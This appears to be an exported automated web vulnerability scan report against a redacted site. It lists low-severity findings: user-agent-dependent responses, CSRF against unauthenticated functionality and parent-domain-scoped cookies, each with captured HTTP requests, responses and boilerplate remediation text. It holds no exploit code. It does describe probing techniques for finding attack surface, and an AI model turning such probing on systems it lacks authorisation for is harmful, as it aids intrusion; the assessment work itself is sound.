    HTTP/2 200 OK +Date: Sat, 11 Jun 2022 07:22:36 GMT +Content-Type: application/javascript +Cf-Bgj: minify +Cf-Polished: origSize=20194 +Cache-Control: public, max-age=3600, s-maxage=3600 +Content-Security-Policy: default-src 'none'; base-uri 'self'; media-src 'self'; script-src 'self' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; worker-src 'self' blob:; img-src 'self'; font-src 'self'; manifest-src 'self'; connect-src 'self'; frame-ancestors 'none'; form-action 'self'; +Cross-Origin-Embedder-Policy: require-corp +Cross-Origin-Opener-Policy: same-origin +Etag: W/"625ded12-4ee2" +Last-Modified: Mon, 18 Apr 2022 22:58:26 GMT +Referrer-Policy: no-referrer +Strict-Transport-Security: max-age=63072000; includeSubDomains; preload +X-Content-Type-Options: nosniff +X-Dns-Prefetch-Control: off +X-Envoy-Upstream-Service-Time: 0 +X-Frame-Options: DENY +X-Xss-Protection: 1; mode=block +Cf-Cache-Status: HIT +Age: 1322 +Expect-Ct: max-age=604800, report-uri="https://redacted/redacted/beacon/expect-ct" +Report-To: {"endpoints":[{"url":"https:\/\/redacted.com\/report\/v3?s=ikK%2FjEBZAL9defkuMUuqDGzJhyOtxNdPIrz8S6Wbgjb9k0oqsRfk1FY7fxUS39oGKGHRCGEY1GEit9b1CEesILnYz2oYlLj3vK2cA7Szt11BC4gG5MUSI%2FpO%2BsD4kYYlYFsv318U"}],"group":"cf-nel","max_age":604800} +Nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding +Server: redacted +Cf-Ray: 719898b76abc39e3-SEA + +https://example.com
    +

    Request 2:

    +
    GET /redacted?94ef82ad72dfadb7b729 HTTP/2 +Host: https://example.com +Cookie: __cfruid=d75817bc7ad6710ac75db6ba48f6fc37f6551137-1654930833 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +Accept: */* +sec-ch-ua-platform: +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3 + +Connection: close +Cache-Control: max-age=0 + +
    +

    Response 2:

    +
    HTTP/2 429 Too Many Requests +Date: Sat, 11 Jun 2022 07:41:32 GMT +Content-Type: application/json +Retry-After: 1410 +Cache-Control: no-cache +Expect-Ct: max-age=604800, report-uri="https://redacted/redacted/beacon/expect-ct" +Report-To: {"endpoints":[{"url":"https:\/\/redacted.com\/report\/v3?s=L2WFTibBpt%2BDhz%2FM6xUsroO7aDsCqxemxbtfR5S2iCsjTRaytUG%2FkpoCM14Y90hhfm8KiD88byOP3wtdTPNURqNUE18gjpH7cEXpn2yhCOZ9STqt6Hgcwd4dsUUfw4Qgt3xxCBTK"}],"group":"cf-nel","max_age":604800} +Nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding +Server: redacted +Cf-Ray: 7198b477ff230905-SEA + +https://example.com +
    + +
    + +

    User agent-dependent response

    +/redacted + +

    +Issue description +

    +
    +

    Application responses may depend systematically on the value of the User-Agent header in requests. This behavior does not itself constitute a security vulnerability, but may point towards additional attack surface within the application, which may contain vulnerabilities.

    +

    This behavior often arises because applications provide different user interfaces for desktop and mobile users. Mobile interfaces have often been less thoroughly tested for vulnerabilities such as cross-site scripting, and often have simpler authentication and session handling mechanisms that may contain problems that are not present in the full interface.

    +

    To review the interface provided by the alternate User-Agent header, you can configure a match/replace rule in Burp Proxy to modify the User-Agent header in all requests, and then browse the application in the normal way using your normal browser.

    +
    + +

    Vulnerability classifications

    + + +

    Request 1:

    +
    GET /redacted?94ef82ad72dfadb7b729 HTTP/2 +Host: https://example.com +Cookie: __cfruid=d75817bc7ad6710ac75db6ba48f6fc37f6551137-1654930833 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +Accept: */* +sec-ch-ua-platform: +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 + +Connection: close +Cache-Control: max-age=0 + +
    +

    Response 1:

    +
    HTTP/2 200 OK +Date: Sat, 11 Jun 2022 09:07:48 GMT +Content-Type: application/javascript +Cf-Bgj: minify +Cf-Polished: origSize=1049193 +Cache-Control: public, max-age=3600, s-maxage=3600 +Content-Security-Policy: default-src 'none'; base-uri 'self'; media-src 'self'; script-src 'self' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; worker-src 'self' blob:; img-src 'self'; font-src 'self'; manifest-src 'self'; connect-src 'self'; frame-ancestors 'none'; form-action 'self'; +Cross-Origin-Embedder-Policy: require-corp +Cross-Origin-Opener-Policy: same-origin +Etag: W/"625ded12-100269" +Last-Modified: Mon, 18 Apr 2022 22:58:26 GMT +Referrer-Policy: no-referrer +Strict-Transport-Security: max-age=63072000; includeSubDomains; preload +X-Content-Type-Options: nosniff +X-Dns-Prefetch-Control: off +X-Envoy-Upstream-Service-Time: 2 +X-Frame-Options: DENY +X-Xss-Protection: 1; mode=block +Cf-Cache-Status: HIT +Expect-Ct: max-age=604800, report-uri="https://redacted/redacted/beacon/expect-ct" +Report-To: {"endpoints":[{"url":"https:\/\/redacted.com\/report\/v3?s=cCFLlw6n5wW3Ldjjl6LuyTV8wSe2NB%2BTvbYZ53oMUMIcG3zPtSdA%2F%2BiVsFefROIRswr1sqVCHiWhGCsJhKycCtU7E2r88BYZodxu7l8wCz98bmxHdsBkYlw%2FRLnZi1J17M0aG5T6"}],"group":"cf-nel","max_age":604800} +Nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding +Server: redacted +Cf-Ray: 719932cea804139a-SEA + +https://example.com
    +

    Request 2:

    +
    GET /redacted?94ef82ad72dfadb7b729 HTTP/2 +Host: https://example.com +Cookie: __cfruid=d75817bc7ad6710ac75db6ba48f6fc37f6551137-1654930833 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +Accept: */* +sec-ch-ua-platform: +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3 + +Connection: close +Cache-Control: max-age=0 + +
    +

    Response 2:

    +
    HTTP/2 429 Too Many Requests +Date: Sat, 11 Jun 2022 09:20:42 GMT +Content-Type: application/json +Retry-After: 2818 +Cache-Control: no-cache +Expect-Ct: max-age=604800, report-uri="https://redacted/redacted/beacon/expect-ct" +Report-To: {"endpoints":[{"url":"https:\/\/redacted.com\/report\/v3?s=chRQ6%2BPF07VW3O%2B6vBiO3yqbR0IOtbfwIaFIaZhYUIc%2BJ6LqK09OIF4tLv4GV688UAYkyazUxuoKSnpPydJ5Hn0GUgRAiVx9LE2x6icFWbKHCyvnkQNcfO%2FL6hV2%2FOdai2qrPy%2Bq"}],"group":"cf-nel","max_age":604800} +Nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding +Server: redacted +Cf-Ray: 719945bc0d4830b3-SEA + +https://example.com +
    + +
    + +

    User agent-dependent response

    +/redacted + +

    +Issue description +

    +
    +

    Application responses may depend systematically on the value of the User-Agent header in requests. This behavior does not itself constitute a security vulnerability, but may point towards additional attack surface within the application, which may contain vulnerabilities.

    +

    This behavior often arises because applications provide different user interfaces for desktop and mobile users. Mobile interfaces have often been less thoroughly tested for vulnerabilities such as cross-site scripting, and often have simpler authentication and session handling mechanisms that may contain problems that are not present in the full interface.

    +

    To review the interface provided by the alternate User-Agent header, you can configure a match/replace rule in Burp Proxy to modify the User-Agent header in all requests, and then browse the application in the normal way using your normal browser.

    +
    + +

    Vulnerability classifications

    + + +

    Request 1:

    +
    GET /redacted HTTP/2 +Host: https://example.com +Cookie: __cfruid=8d467a9836d19fd26dfe28fbf19907453cba442d-1654930838 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +Accept: */* +sec-ch-ua-platform: +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 + +Connection: close +Cache-Control: max-age=0 + +
    +

    Response 1:

    +
    HTTP/2 200 OK +Date: Sat, 11 Jun 2022 09:13:49 GMT +Content-Type: application/javascript +Cf-Bgj: minify +Cf-Polished: origSize=2292583 +Cache-Control: public, max-age=3600, s-maxage=3600 +Content-Security-Policy: default-src 'none'; base-uri 'self'; media-src 'self'; script-src 'self' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; worker-src 'self' blob:; img-src 'self'; font-src 'self'; manifest-src 'self'; connect-src 'self'; frame-ancestors 'none'; form-action 'self'; +Cross-Origin-Embedder-Policy: require-corp +Cross-Origin-Opener-Policy: same-origin +Etag: W/"625ded12-22fb67" +Last-Modified: Mon, 18 Apr 2022 22:58:26 GMT +Referrer-Policy: no-referrer +Strict-Transport-Security: max-age=63072000; includeSubDomains; preload +X-Content-Type-Options: nosniff +X-Dns-Prefetch-Control: off +X-Envoy-Upstream-Service-Time: 1 +X-Frame-Options: DENY +X-Xss-Protection: 1; mode=block +Cf-Cache-Status: HIT +Expect-Ct: max-age=604800, report-uri="https://redacted/redacted/beacon/expect-ct" +Report-To: {"endpoints":[{"url":"https:\/\/redacted.com\/report\/v3?s=okxX%2FMljEx19SvTpIPCbfs6HvHM190lKPe8L586%2FbLJZVBx3b18wX8cvEfdTyNFluurNkt6zK%2BKSI84Ch3CNuRtnC6J6UIPetbGv55WMjnDVPFeqzFWRwboNxbRnOq5dsKos10Wj"}],"group":"cf-nel","max_age":604800} +Nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding +Server: redacted +Cf-Ray: 71993ba43aae3089-SEA + +https://example.com
    +

    Request 2:

    +
    GET /redacted HTTP/2 +Host: https://example.com +Cookie: __cfruid=8d467a9836d19fd26dfe28fbf19907453cba442d-1654930838 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +Accept: */* +sec-ch-ua-platform: +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3 + +Connection: close +Cache-Control: max-age=0 + +
    +

    Response 2:

    +
    HTTP/2 429 Too Many Requests +Date: Sat, 11 Jun 2022 09:22:58 GMT +Content-Type: application/json +Retry-After: 2683 +Cache-Control: no-cache +Expect-Ct: max-age=604800, report-uri="https://redacted/redacted/beacon/expect-ct" +Report-To: {"endpoints":[{"url":"https:\/\/redacted.com\/report\/v3?s=dEEtpbiEmmeZY0lUd6wmrN5rAobfkW8a6OXkOTZtaDHtG0DV04ignJ8ekAzI04sCFDml0BJW3LeC8XugVpcVPr5xO%2B8WXrgLBumMdZj9oo%2BH1OUYz8KNrMpyREuNkmMX2T1bgJpp"}],"group":"cf-nel","max_age":604800} +Nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding +Server: redacted +Cf-Ray: 71994908ee1a5fe6-SEA +
    + +
    +
    + +
    +
    + +

    Cross-site request forgery

    +/redacted + +

    Issue detail:

    +
    +The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against unauthenticated functionality. This is unlikely to constitute a security vulnerability in its own right, however it may facilitate exploitation of other vulnerabilities affecting application users. +
    + +

    +Issue background +

    +
    +

    Cross-site request forgery (CSRF) vulnerabilities may arise when applications rely solely on HTTP cookies to identify the user that has issued a particular request. Because browsers automatically add cookies to requests regardless of their origin, it may be possible for an attacker to create a malicious web site that forges a cross-domain request to the vulnerable application. For a request to be vulnerable to CSRF, the following conditions must hold:

    +
      +
    • The request can be issued cross-domain, for example using an HTML form. If the request contains non-standard headers or body content, then it may only be issuable from a page that originated on the same domain.
    • +
    • The application relies solely on HTTP cookies or Basic Authentication to identify the user that issued the request. If the application places session-related tokens elsewhere within the request, then it may not be vulnerable.
    • +
    • The request performs some privileged action within the application, which modifies the application's state based on the identity of the issuing user.
    • The attacker can determine all the parameters required to construct a request that performs the action. If the request contains any values that the attacker cannot determine or predict, then it is not vulnerable.
    +
    + +

    +Issue remediation +

    +
    +

    The most effective way to protect against CSRF vulnerabilities is to include within relevant requests an additional token that is not transmitted in a cookie: for example, a parameter in a hidden form field. This additional token should contain sufficient entropy, and be generated using a cryptographic random number generator, such that it is not feasible for an attacker to determine or predict the value of any token that was issued to another user. The token should be associated with the user's session, and the application should validate that the correct token is received before performing any action resulting from the request.

    +

    An alternative approach, which may be easier to implement, is to validate that Host and Referer headers in relevant requests are both present and contain the same domain name. However, this approach is somewhat less robust: historically, quirks in browsers and plugins have often enabled attackers to forge cross-domain requests that manipulate these headers to bypass such defenses.

    +
    + +

    References

    + + +

    Vulnerability classifications

    + + +

    Request:

    +
    POST /redacted HTTP/2 +Host: https://example.com +Cookie: __cfruid=d1db725338a0a9a40800e81127effa72b4e1cbde-1654931039 +Origin: https://example.com +sec-ch-ua: +sec-ch-ua-mobile: ?0 +Accept: */* +sec-ch-ua-platform: +Content-Type: application/json +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Content-Length: 0 + +
    +

    Response:

    +
    HTTP/2 200 OK +Date: Sat, 11 Jun 2022 07:04:01 GMT +Server: redacted +Cf-Ray: 71987d814c2260bf-SEA +X-Frame-Options: DENY +X-Content-Type-Options: nosniff + +
    + +
    +
    + +
    + +
    +

    More details for https://example.com

    +
    + +
    +
    + +

    Cookie scoped to parent domain

    +/ + +

    Issue detail:

    +
    +The following cookie was issued by the application and is scoped to a parent of the issuing domain:
    • __cfruid
    The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. +
    + +

    +Issue background +

    +
    +

    A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

    +
    + +

    +Issue remediation +

    +
    +

    By default, cookies are scoped to the issuing domain, and on IE/Edge to subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems that support those applications.

    +
    + +

    Vulnerability classifications

    + + +

    Request:

    +
    GET / HTTP/1.1 +Host: https://example.com +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +Connection: close +Cache-Control: max-age=0 + +
    +

    Response:

    +
    HTTP/1.1 301 Moved Permanently +Date: Sat, 11 Jun 2022 07:00:33 GMT +Connection: close +Cache-Control: max-age=3600 +Expires: Sat, 11 Jun 2022 08:00:33 GMT +Location: https://example.com/ +Report-To: {"endpoints":[{"url":"https:\/\/redacted.com\/report\/v3?s=%2FUALE32sIebIUo0DOfNh0d0AVf5FfGomVqTAAlbT%2FdyKoCo1Cr6vwT9slKXiN9Ru5jUdIU4qjqv0Fyn1EpWNLtl5fgwns8tSuUzMKsUw8sCwyfRkEFnzHfeBobZZPpuyIaPAXsrR"}],"group":"cf-nel","max_age":604800} +NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding +Set-Cookie: __cfruid=d75817bc7ad6710ac75db6ba48f6fc37f6551137-1654930833; path=/; domain=.redacted.com; HttpOnly +Server: redacted +CF-RAY: 7198786d5cb8091d-SEA +Content-Length: 0 + +
    + +
    + +

    Cookie scoped to parent domain

    +/redacted + +

    Issue detail:

    +
    +The following cookie was issued by the application and is scoped to a parent of the issuing domain:
    • __cfruid
    The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. +
    + +

    +Issue background +

    +
    +

    A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

    +
    + +

    +Issue remediation +

    +
    +

    By default, cookies are scoped to the issuing domain, and on IE/Edge to subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems that support those applications.

    +
    + +

    Vulnerability classifications

    + + +

    Request:

    +
    GET /redacted HTTP/1.1 +Host: https://example.com +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +Connection: close +Cache-Control: max-age=0 + +
    +

    Response:

    +
    HTTP/1.1 301 Moved Permanently +Date: Sat, 11 Jun 2022 07:01:42 GMT +Connection: close +Cache-Control: max-age=3600 +Expires: Sat, 11 Jun 2022 08:01:42 GMT +Location: https://example.com/help +Report-To: {"endpoints":[{"url":"https:\/\/redacted.com\/report\/v3?s=qCzD4g%2F1kw7nbUSLpSh0sZ853HE6ito40XIvo%2FH%2BQhbpe6Uze7RDJ3zIVdgeyhfcckimNlr08Yf5F6UtGxxIUHP2pXethA72jAjfSVSQPcrYYselewPcD77kfWRFfDVkpHVlmKbY"}],"group":"cf-nel","max_age":604800} +NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding +Set-Cookie: __cfruid=b4ed5cee943ab8a032d98b9afb748493ad5508af-1654930902; path=/; domain=.redacted.com; HttpOnly +Server: redacted +CF-RAY: 71987a1a99db3a0e-SEA +Content-Length: 0 + +
    + +
    + +

    Cookie scoped to parent domain

    +/redacted + +

    Issue detail:

    +
    +The following cookie was issued by the application and is scoped to a parent of the issuing domain:
    • __cfruid
    The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. +
    + +

    +Issue background +

    +
    +

    A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

    +
    + +

    +Issue remediation +

    +
    +

    By default, cookies are scoped to the issuing domain, and on IE/Edge to subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems that support those applications.

    +
    + +

    Vulnerability classifications

    + + +

    Request:

    +
    GET /redacted HTTP/1.1 +Host: https://example.com +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +Connection: close +Cache-Control: max-age=0 + +
    +

    Response:

    +
    HTTP/1.1 301 Moved Permanently +Date: Sat, 11 Jun 2022 07:01:43 GMT +Connection: close +Cache-Control: max-age=3600 +Expires: Sat, 11 Jun 2022 08:01:43 GMT +Location: https://example.com/redactedSet-Cookie: __cfruid=f6065aa88005db6a289e73f76240abfef21a0126-1654930903; path=/; domain=.redacted.com; HttpOnly +Server: redacted +CF-RAY: 71987a23eb0b0927-SEA +Content-Length: 0 + +
    + +
    + +

    Cookie scoped to parent domain

    +/redacted + +

    Issue detail:

    +
    +The following cookie was issued by the application and is scoped to a parent of the issuing domain:
    • __cfruid
    The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. +
    + +

    +Issue background +

    +
    +

    A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

    +
    + +

    +Issue remediation +

    +
    +

    By default, cookies are scoped to the issuing domain, and on IE/Edge to subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems that support those applications.

    +
    + +

    Vulnerability classifications

    + + +

    Request:

    +
    GET /redacted HTTP/1.1 +Host: https://example.com +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +Connection: close +Cache-Control: max-age=0 + +
    +

    Response:

    +
    HTTP/1.1 301 Moved Permanently +Date: Sat, 11 Jun 2022 07:01:45 GMT +Connection: close +Cache-Control: max-age=3600 +Expires: Sat, 11 Jun 2022 08:01:45 GMT +Location: https://example.com/redactedSet-Cookie: __cfruid=b7ee4175eb89f8f65a910c14e5e855b2fd3a1516-1654930905; path=/; domain=.redacted.com; HttpOnly +Server: redacted +CF-RAY: 71987a2e0a7f5fbc-SEA +Content-Length: 0 + +
    + +
    + +

    Cookie scoped to parent domain

    +/redacted + +

    Issue detail:

    +
    +The following cookie was issued by the application and is scoped to a parent of the issuing domain:
    • __cfruid
    The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. +
    + +

    +Issue background +

    +
    +

    A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

    +
    + +

    +Issue remediation +

    +
    +

    By default, cookies are scoped to the issuing domain, and on IE/Edge to subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems that support those applications.

    +
    + +

    Vulnerability classifications

    + + +

    Request:

    +
    GET /redacted HTTP/1.1 +Host: https://example.com +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +Connection: close +Cache-Control: max-age=0 + +
    +

    Response:

    +
    HTTP/1.1 301 Moved Permanently +Date: Sat, 11 Jun 2022 07:02:48 GMT +Connection: close +Cache-Control: max-age=3600 +Expires: Sat, 11 Jun 2022 08:02:48 GMT +Location: https://example.com/redactedSet-Cookie: __cfruid=692fabd448314c08d72b2f148b1c1328793fe491-1654930968; path=/; domain=.redacted.com; HttpOnly +Server: redacted +CF-RAY: 71987bb8dde327ea-SEA +Content-Length: 0 + +
    + +
    + +

    Cookie scoped to parent domain

    +/redacted + +

    Issue detail:

    +
    +The following cookie was issued by the application and is scoped to a parent of the issuing domain:
    • __cfruid
    The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. +
    + +

    +Issue background +

    +
    +

    A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

    +
    + +

    +Issue remediation +

    +
    +

    By default, cookies are scoped to the issuing domain, and on IE/Edge to subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems that support those applications.

    +
    + +

    Vulnerability classifications

    + + +

    Request:

    +
    GET /redacted HTTP/1.1 +Host: https://example.com +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +Connection: close +Cache-Control: max-age=0 + +
    +

    Response:

    +
    HTTP/1.1 301 Moved Permanently +Date: Sat, 11 Jun 2022 07:02:46 GMT +Connection: close +Cache-Control: max-age=3600 +Expires: Sat, 11 Jun 2022 08:02:46 GMT +Location: https://example.com/redactedSet-Cookie: __cfruid=7ef2437b49ccb592ab22c9631737966ef28f6125-1654930966; path=/; domain=.redacted.com; HttpOnly +Server: redacted +CF-RAY: 71987bae8cb3610e-SEA +Content-Length: 0 + +
    + +
    + +

    Cookie scoped to parent domain

    +/redacted + +

    Issue detail:

    +
    +The following cookie was issued by the application and is scoped to a parent of the issuing domain:
    • __cfruid
    The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. +
    + +

    +Issue background +

    +
    +

    A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

    +
    + +

    +Issue remediation +

    +
    +

    By default, cookies are scoped to the issuing domain, and on IE/Edge to subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems that support those applications.

    +
    + +

    Vulnerability classifications

    + + +

    Request:

    +
    GET /redacted HTTP/1.1 +Host: https://example.com +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +Connection: close +Cache-Control: max-age=0 + +
    +

    Response:

    +
